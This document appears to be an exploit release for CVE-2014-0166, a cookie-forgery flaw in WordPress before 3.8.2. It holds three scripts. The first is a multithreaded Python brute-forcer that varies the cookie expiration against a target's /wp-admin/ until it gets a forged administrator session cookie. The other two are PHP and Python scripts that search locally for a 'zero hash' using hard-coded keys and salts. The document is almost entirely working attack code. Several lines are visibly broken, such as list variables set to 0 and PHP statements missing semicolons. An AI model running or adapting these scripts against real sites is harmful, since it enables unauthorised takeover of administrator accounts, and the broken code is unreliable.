WordPress < 3.8.2 cookie forgery vulnerability
#!/usr/bin/env python """ This script is the EXP of CVE-2014-0166. By varying the expiration value of the cookie, an attacker can find a 'zero hash' to forge a valid cookie. However, on average, we need 300 million requets to find a 'zero hash'. Therefore I wrote this multithread script. Details: http://www.ettack.org/wordpress-cookie-forgery/ Author: Ettack Email: email protected """ import requests import hmac import threading from hashlib import md5 from sys import stdout from time import sleep,ctime,gmtime,time from os import _exit initnum = 0 #Set the initial value here while performing distributed computing. threadNum = 500 errTolerance = 0 #If ErrorRequests/AllRequests > errTolerance, then decrease threads number lock = threading.Lock() url = 'http://test.com' user = 'ettack' expiration = 1400000000+initnum cnt = 0+initnum cookie_k = 'wordpress_' + md5(url).hexdigest() def testCookie(url,user,expr): global errcnt cookie_v = user + '|' + str(expr) + '|0' cookie = {cookie_k:cookie_v} try: r = requests.head(url + '/wp-admin/',cookies=cookie) except requests.exceptions.ConnectionError: errcnt += 1 # print "Connection ERROR occured in %s"%(threading.current_thread()) sleep(8) return "Err" statcode = r.status_code if statcode == 200: return cookie if statcode != 302: errcnt += 1 sleep(5) return "Err" return False def action(): lock.acquire() global expiration,cnt expiration += 1 cnt += 1 stdout.flush() stdout.write("\r%s"%(cnt)) lock.release() try: #Copy expiration value to expr.As expiration would be increased by other threads. expr = expiration #Loop until no error while True: result = testCookie(url,user,expr) if result != "Err": break except KeyboardInterrupt: print "Interrupted at %s"%(expiration) _exit(0) except Exception,e: print e #Cookie found! Output to screen and file (wp_result). Output consumed time as well. if result != False: print "\n\nCongratulations!!! Found valid cookie:" print str(result) dtime = time()-stime timestr = gmtime(dtime) print "\nRunning time: %sd %sh %sm %ss"%(timestr.tm_mday-1,timestr.tm_hour,timestr.tm_min,timestr.tm_sec) with open("wp_result","w") as fp: fp.write(str(result)) fp.close() _exit(0) stime = time() print "Start at %s"%(ctime()) print "Guessing with %d threads...\n"%(threadNum) #Main part of guessing program while True: threads = errcnt = 0 for i in xrange(threadNum): t = threading.Thread(target = action) threads.append(t) t.start() for t in threads: t.join() #Adjust threads number errRate = float(errcnt)/threadNum if errRate > errTolerance: newThreadNum = int(threadNum * (1-0.5*errRate)) print "\nToo many retries (%d/%d). Automatically decrease to %d threads!"%(errcnt,threadNum+errcnt,newThreadNum) threadNum = newThreadNum #Log process to wp_log with open("wp_log","w") as fp: fp.write(str(cnt)) fp.close()
<?php /** * A script to verify (local) WordPress < 3.8.2 cookie forgery vulnerability * Author: Ettack * Email: email protected */ $site_url = 'http://www.ettack.org'; //Used for generating cookie key: 'wordpress_'+hash($site_url) $user = 'ettack'; $pass_frag = '1234'; //Fragment of your password hash. $pass_frag = substr($user->user_pass, 8, 4) $scheme = ''; $unit = 100000000; $init = empty($argv1)?0:$argv1*$unit; //Start point. e.g. 2 for 200000000 $exptime = 1400000000+$init; $cnt = 0+$init; $max = $init + $unit; function gen_cookie($site_url,$user,$exptime,$pass_frag,$scheme) { $lk = 'E..y-UBzte>Ddu^pF~kFsCPd6zD)%gar?0lBPiki9Kg_M`^<b3&`PtowYZ6V/1sU'; //$auth_key configured in wp-config.php $ls = '()_m._cRk}-Uj|tZ9GEZXJFJ}Ab+AT}:T!ug{I*o`PmmJ`4~/ry^:y0H$g:.fpm}'; //$auth_salt configured in wp-config.php $key = hash_hmac('md5',$user.$pass_frag.'|'.$exptime,$lk.$ls); $hash = hash_hmac('md5',$user.'|'.$exptime,$key); return $hash; } while ($cnt<$max) { $cnt++; $exptime++; if ($cnt % 10000 == 0) { echo "\rTrying: ".$exptime; //real-time status output } $hs = gen_cookie($site_url,$user,$exptime,$pass_frag,$scheme); //when "zero hash" found, output and exit if ($hs == "0") { echo "\n\nAfter ".$cnt." tries, we found: \n"; echo "Expiration: ".$exptime."\n"; echo "Hash: ".$hs."\n"; echo "Cookie Key: ".'wordpress'.$scheme.md5($site_url).'\n' echo "Cookie Value: ".$user.'|'.$exptime.'|'.$hs.'\n' break; } } ?>
import re,hmac from multiprocessing import Process,Value from sys import stdout user = 'ettack' pass_frag = 'u5dr' pnum = 8 exprstart = 1400000000 def gen_cookie(user,exptime,pass_frag): lk = 'dBr|SFMq6`VaOFKw>r~^Npl(-z &OA(9{(W &(?2h&I}v1!V+Kx.m|uV-:z89L72' ls = 'a=ec%X>I>#/@z>b);!*Qk*!&zS)@3email protected$v&email protected@I(YkJV4i9<Qp6' key = hmac.new(lk+ls,user+pass_frag+'|'+str(exptime)).hexdigest() hs = hmac.new(key,user+'|'+str(exptime)).hexdigest() return hs def loop(tid,flag): exptime = exprstart+tid while flag.value==0: if (exptime % 10000 == 0): stdout.flush() stdout.write("\rTrying: "+str(exptime)) hs = gen_cookie(user,exptime,pass_frag) if (re.search('^0+e\d*$',hs)): print "\n\nAfter "+str(exptime-exprstart)+" tries, we found: \n" print "Expiration: "+str(exptime)+"\n" print "Hash: "+hs+"\n" flag.value = 1 exptime += pnum if __name__ == '__main__': processes = flag = Value('i',0) for i in xrange(pnum): p = Process(target=loop,args=(i,flag)) processes.append(p) p.start() for p in processes: p.join()